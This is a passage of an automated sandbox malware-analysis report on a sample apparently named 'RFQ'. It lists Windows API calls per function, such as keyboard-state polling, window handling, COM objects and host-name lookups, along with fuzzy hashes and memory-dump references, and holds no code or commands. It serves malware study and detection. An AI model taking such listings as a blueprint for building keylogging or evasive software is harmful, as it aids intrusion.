                                                                                                                                                    • CoTaskMemFree.OLE32(?,?), ref: 00780505
                                                                                                                                                    • _memset.LIBCMT ref: 00780542
                                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0078057E
                                                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 007805A1
                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 007805A8
                                                                                                                                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 007805DF
                                                                                                                                                    • CoUninitialize.OLE32(00000001,00000000), ref: 007805E1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1246142700-0
                                                                                                                                                    • Opcode ID: 606c9074b2f2b63b2136c1acce26b2842f0d572698eab91b50bcbd8b33138357
                                                                                                                                                    • Instruction ID: 877f9d138c6b7057235d1b78f9ae87b64f1c48d636632eee0c81e45fba9c4108
                                                                                                                                                    • Opcode Fuzzy Hash: 606c9074b2f2b63b2136c1acce26b2842f0d572698eab91b50bcbd8b33138357
                                                                                                                                                    • Instruction Fuzzy Hash: 52B1C775A00209AFDB14DFA4C888DAEBBB9EF48314B148469F909EB251D774EE45CB50
                                                                                                                                                    APIs
                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00772ED6
                                                                                                                                                    • SetKeyboardState.USER32(?), ref: 00772F41
                                                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00772F61
                                                                                                                                                    • GetKeyState.USER32(000000A0), ref: 00772F78
                                                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00772FA7
                                                                                                                                                    • GetKeyState.USER32(000000A1), ref: 00772FB8
                                                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00772FE4
                                                                                                                                                    • GetKeyState.USER32(00000011), ref: 00772FF2
                                                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 0077301B
                                                                                                                                                    • GetKeyState.USER32(00000012), ref: 00773029
                                                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00773052
                                                                                                                                                    • GetKeyState.USER32(0000005B), ref: 00773060
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 541375521-0
                                                                                                                                                    • Opcode ID: 9b8f31473de8704977d33bee2c8962a0e30f5190925db90e60038c7490d20be2
                                                                                                                                                    • Instruction ID: f4ff3f0a913f691a719ca97248deda35a3a782d8dc104069ce48ab3baeef5b72
                                                                                                                                                    • Opcode Fuzzy Hash: 9b8f31473de8704977d33bee2c8962a0e30f5190925db90e60038c7490d20be2
                                                                                                                                                    • Instruction Fuzzy Hash: 8051F920A0478869FF35EB648815BEABFB59F113C0F08C59DD5CA561C3DA9C9B8CC762
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 0076ED1E
                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0076ED30
                                                                                                                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0076ED8E
                                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 0076ED99
                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0076EDAB
                                                                                                                                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0076EE01
                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0076EE0F
                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0076EE20
                                                                                                                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0076EE63
                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0076EE71
                                                                                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0076EE8E
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0076EE9B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3096461208-0
                                                                                                                                                    • Opcode ID: a48f1548d656002edd2e4d22a9af98e1ccd0aff2d50067e6b8b3bab1ed3cc03e
                                                                                                                                                    • Instruction ID: f3330fc836b944d800add88dbe7d59fde965b0e1db64545a50cea66c54b87624
                                                                                                                                                    • Opcode Fuzzy Hash: a48f1548d656002edd2e4d22a9af98e1ccd0aff2d50067e6b8b3bab1ed3cc03e
                                                                                                                                                    • Instruction Fuzzy Hash: EA513475B00205AFDB18CF68CD95FAEBBB5FB88704F148229F91AD7290E7759D048B14
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0074B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0074B759,?,00000000,?,?,?,?,0074B72B,00000000,?), ref: 0074BA58
                                                                                                                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0074B72B), ref: 0074B7F6
                                                                                                                                                    • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0074B72B,00000000,?,?,0074B2EF,?,?), ref: 0074B88D
                                                                                                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 007AD8A6
                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0074B72B,00000000,?,?,0074B2EF,?,?), ref: 007AD8D7
                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0074B72B,00000000,?,?,0074B2EF,?,?), ref: 007AD8EE
                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0074B72B,00000000,?,?,0074B2EF,?,?), ref: 007AD90A
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 007AD91C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 641708696-0
                                                                                                                                                    • Opcode ID: d6963773935109b72f14eb8b7ef91f708542c2c0b904ae5d5f367cdc2677ee22
                                                                                                                                                    • Instruction ID: ecc947f0d35de4968e601e821462128906899f80702fb32966f44c854d4faf3c
                                                                                                                                                    • Opcode Fuzzy Hash: d6963773935109b72f14eb8b7ef91f708542c2c0b904ae5d5f367cdc2677ee22
                                                                                                                                                    • Instruction Fuzzy Hash: 80616A30501601DFDB369F15D988B36B7B9FF96321F54862AE04686A60DB7CFC90CB88
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0074B526: GetWindowLongW.USER32(?,000000EB), ref: 0074B537
                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0074B438
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ColorLongWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 259745315-0
                                                                                                                                                    • Opcode ID: d508a057012982f84306eb09f971031497e9e26d488cb77189c39ba370b6a1e9
                                                                                                                                                    • Instruction ID: 1c276059935dc37fd9b086aca6702386f430f5eb3cc007a54f20a435bd8cd97e
                                                                                                                                                    • Opcode Fuzzy Hash: d508a057012982f84306eb09f971031497e9e26d488cb77189c39ba370b6a1e9
                                                                                                                                                    • Instruction Fuzzy Hash: 9A41B134000188AFDB305F2CD889FB93B66AB46731F198361FD658A1E6E738CD42DB21
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 136442275-0
                                                                                                                                                    • Opcode ID: 255862feb7588c7c88ae20e18fa13b1cc32d76187eac5995bbc4afd1c58e31c4
                                                                                                                                                    • Instruction ID: af8802d1650ae98c391a8a7a40be8b6e9ee5dbae79f093316f0d057197b4f0be
                                                                                                                                                    • Opcode Fuzzy Hash: 255862feb7588c7c88ae20e18fa13b1cc32d76187eac5995bbc4afd1c58e31c4
                                                                                                                                                    • Instruction Fuzzy Hash: DA41307684521CAECF61DB90CC45DCF73BCEB44300F0081E6FA59A2055EA75ABE98FA0
                                                                                                                                                    APIs
                                                                                                                                                    • CharLowerBuffW.USER32(007CDC00,007CDC00,007CDC00), ref: 0077D7CE
                                                                                                                                                    • GetDriveTypeW.KERNEL32(?,007E3A70,00000061), ref: 0077D898
                                                                                                                                                    • _wcscpy.LIBCMT ref: 0077D8C2
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                    • API String ID: 2820617543-1000479233
                                                                                                                                                    • Opcode ID: 7b39b32a82b37357cbd869fe60c8a22f65e1c0b35d921ac24b3983727508d86a
                                                                                                                                                    • Instruction ID: 2b166aaa6abce58aa974d76e6001cbff829714d0505c45af1e3f06db713933a9
                                                                                                                                                    • Opcode Fuzzy Hash: 7b39b32a82b37357cbd869fe60c8a22f65e1c0b35d921ac24b3983727508d86a
                                                                                                                                                    • Instruction Fuzzy Hash: D9519F31504340EFCB20EF14D885AAAB7B5FF84354F10C92DF59A572A2EB39ED45CA52
                                                                                                                                                    APIs
                                                                                                                                                    • __swprintf.LIBCMT ref: 007393AB
                                                                                                                                                    • __itow.LIBCMT ref: 007393DF
                                                                                                                                                      • Part of subcall function 00751557: _xtow@16.LIBCMT ref: 00751578
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: __itow__swprintf_xtow@16
• String ID: %.15g$0x%p$False$True
• API String ID: 1502193981-2263619337
• Opcode ID: cf0066a395d66b2b7ed454f531e9d6853800453e093557c7856850ce47c79c93
• Instruction ID: dc901b310749fc80519b1683ffa13702b8caeb44dd67cbd645f1829634bff83c
• Opcode Fuzzy Hash: cf0066a395d66b2b7ed454f531e9d6853800453e093557c7856850ce47c79c93
• Instruction Fuzzy Hash: 064108B1504204DBEB24EB38D945FA9B3F4EF89310F20446AF549D71C2EABA9941CB61
APIs
• MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0079A259
• CreateCompatibleDC.GDI32(00000000), ref: 0079A260
• SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0079A273
• SelectObject.GDI32(00000000,00000000), ref: 0079A27B
• GetPixel.GDI32(00000000,00000000,00000000), ref: 0079A286
• DeleteDC.GDI32(00000000), ref: 0079A28F
• GetWindowLongW.USER32(?,000000EC), ref: 0079A299
• SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0079A2AD
• DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0079A2B9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
• String ID: static
• API String ID: 2559357485-2160076837
• Opcode ID: 5b3a17ea0b52c7c1f3a4e0a36e0295aa623f3334b6c710ce0a3eb924bfea01ce
• Instruction ID: 9b09ed18541309f6d8eb1a590e9037e18e8e25f19aee7299c30e85d306c87e0d
• Opcode Fuzzy Hash: 5b3a17ea0b52c7c1f3a4e0a36e0295aa623f3334b6c710ce0a3eb924bfea01ce
• Instruction Fuzzy Hash: 3D316B31101219BBDF219FA4EC49FEA3B69FF49364F114314FA19A60A0D7399811DBA5
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 2620052-3771769585
• Opcode ID: 088d2a2c73de01a2669535ce89c5f0a878df1cf98620ad2fbd12cd9aca4a80fb
• Instruction ID: 36f3830ef634e71119d9ef1f8b6d2e59781106d42ce131bd9dd0ca404166ef25
• Opcode Fuzzy Hash: 088d2a2c73de01a2669535ce89c5f0a878df1cf98620ad2fbd12cd9aca4a80fb
• Instruction Fuzzy Hash: 9C11E771604215ABCF346B70AC4DEEA77BCEF44711F0081A5F50996081FFBC9E858664
APIs
• _memset.LIBCMT ref: 00755047
  • Part of subcall function 00757C0E: __getptd_noexit.LIBCMT ref: 00757C0E
• __gmtime64_s.LIBCMT ref: 007550E0
• __gmtime64_s.LIBCMT ref: 00755116
• __gmtime64_s.LIBCMT ref: 00755133
• __allrem.LIBCMT ref: 00755189
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007551A5
• __allrem.LIBCMT ref: 007551BC
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007551DA
• __allrem.LIBCMT ref: 007551F1
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0075520F
• __invoke_watson.LIBCMT ref: 00755280
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
• String ID:
• API String ID: 384356119-0
• Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
• Instruction ID: ae8ab49d9f75e54e4ee1abe73e694f50af7738b30cb34ad523f60a8c6dd0af4c
• Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
• Instruction Fuzzy Hash: 9971C4B2A00F1AABE7149E78CC65B9A77A8BF00365F144229EC15D6681E7B8D94487D0
APIs
• _memset.LIBCMT ref: 00774DF8
• GetMenuItemInfoW.USER32(007F1708,000000FF,00000000,00000030), ref: 00774E59
• SetMenuItemInfoW.USER32(007F1708,00000004,00000000,00000030), ref: 00774E8F
• Sleep.KERNEL32(000001F4), ref: 00774EA1
• GetMenuItemCount.USER32(?), ref: 00774EE5
• GetMenuItemID.USER32(?,00000000), ref: 00774F01
• GetMenuItemID.USER32(?,-00000001), ref: 00774F2B
• GetMenuItemID.USER32(?,?), ref: 00774F70
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00774FB6
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00774FCA
• SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00774FEB
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountRadioSleep_memset
• String ID:
• API String ID: 4176008265-0
• Opcode ID: 495e8d5747257f854d066730bc597cf2ec0e3e797dd099128636f71d570a35e2
• Instruction ID: 337e344347640d2f920825059c270b994e7773cf47af7f2aa5110759590d13be
• Opcode Fuzzy Hash: 495e8d5747257f854d066730bc597cf2ec0e3e797dd099128636f71d570a35e2
• Instruction Fuzzy Hash: 6F61AF71A00249EFDF21CFA4D888EBE7BB8FB05388F188559F409A3251D779AD15CB20
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00799C98
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00799C9B
• GetWindowLongW.USER32(?,000000F0), ref: 00799CBF
• _memset.LIBCMT ref: 00799CD0
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00799CE2
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00799D5A
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: MessageSend$LongWindow_memset
• String ID:
• API String ID: 830647256-0
• Opcode ID: 97b6eed4a13df6529906f7e287bb99029245842e271fe20d86405c388d6fb3e2
• Instruction ID: 0856ec2a1b78b56e0a4db789791182c71e6e3c354132dd50e9d9ed5f3cf38cec
• Opcode Fuzzy Hash: 97b6eed4a13df6529906f7e287bb99029245842e271fe20d86405c388d6fb3e2
• Instruction Fuzzy Hash: 5E615975A00208EFEB20DFA8DC81EEE77B8EB09714F144199FA14E7291D778AD41DB60
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 007694FE
• SafeArrayAllocData.OLEAUT32(?), ref: 00769549
• VariantInit.OLEAUT32(?), ref: 0076955B
• SafeArrayAccessData.OLEAUT32(?,?), ref: 0076957B
• VariantCopy.OLEAUT32(?,?), ref: 007695BE
• SafeArrayUnaccessData.OLEAUT32(?), ref: 007695D2
• VariantClear.OLEAUT32(?), ref: 007695E7
• SafeArrayDestroyData.OLEAUT32(?), ref: 007695F4
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007695FD
• VariantClear.OLEAUT32(?), ref: 0076960F
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0076961A
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2706829360-0
                                                                                                                                                    • Opcode ID: 98d63a420d5a182ed0c0801ca600b0635a3fa5b870de71921c7bf259fe9b7450
                                                                                                                                                    • Instruction ID: 4a6f05429a1492d187d67cbdfc71515d66813ce38b2da2ff90d050d7264e454d
                                                                                                                                                    • Opcode Fuzzy Hash: 98d63a420d5a182ed0c0801ca600b0635a3fa5b870de71921c7bf259fe9b7450
                                                                                                                                                    • Instruction Fuzzy Hash: D8413075900219EFCB11DFA4D848DDEBF79FF08354F108465E902A3251EB39AA45CBA5
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$ClearInit$_memset
                                                                                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?~$|?~
                                                                                                                                                    • API String ID: 2862541840-2954734213
                                                                                                                                                    • Opcode ID: cea873e039101b6855273fd773c5883284ba60358d56583e16b03c99649903ed
                                                                                                                                                    • Instruction ID: c6448722d7791de2cfea772df72130ae41c27101f17085224c62b34a8ebe3fde
                                                                                                                                                    • Opcode Fuzzy Hash: cea873e039101b6855273fd773c5883284ba60358d56583e16b03c99649903ed
                                                                                                                                                    • Instruction Fuzzy Hash: FE91A171A40215EFDF24EFA5C848FAEBBB8EF45710F108559F515AB280D7789940CFA0
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0073936C: __swprintf.LIBCMT ref: 007393AB
                                                                                                                                                      • Part of subcall function 0073936C: __itow.LIBCMT ref: 007393DF
                                                                                                                                                    • CoInitialize.OLE32 ref: 0078ADF6
                                                                                                                                                    • CoUninitialize.OLE32 ref: 0078AE01
                                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,007BD8FC,?), ref: 0078AE61
                                                                                                                                                    • IIDFromString.OLE32(?,?), ref: 0078AED4
                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0078AF6E
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0078AFCF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                    • API String ID: 834269672-1287834457
                                                                                                                                                    • Opcode ID: 045edf75e5e86060046bb6b9a9f30f5fe2554dff82d0441efc67d8625b1d11f1
                                                                                                                                                    • Instruction ID: 655c18b438c5973b0d7ebb92244a45d35d633e069654bc55832f22cd7e838df0
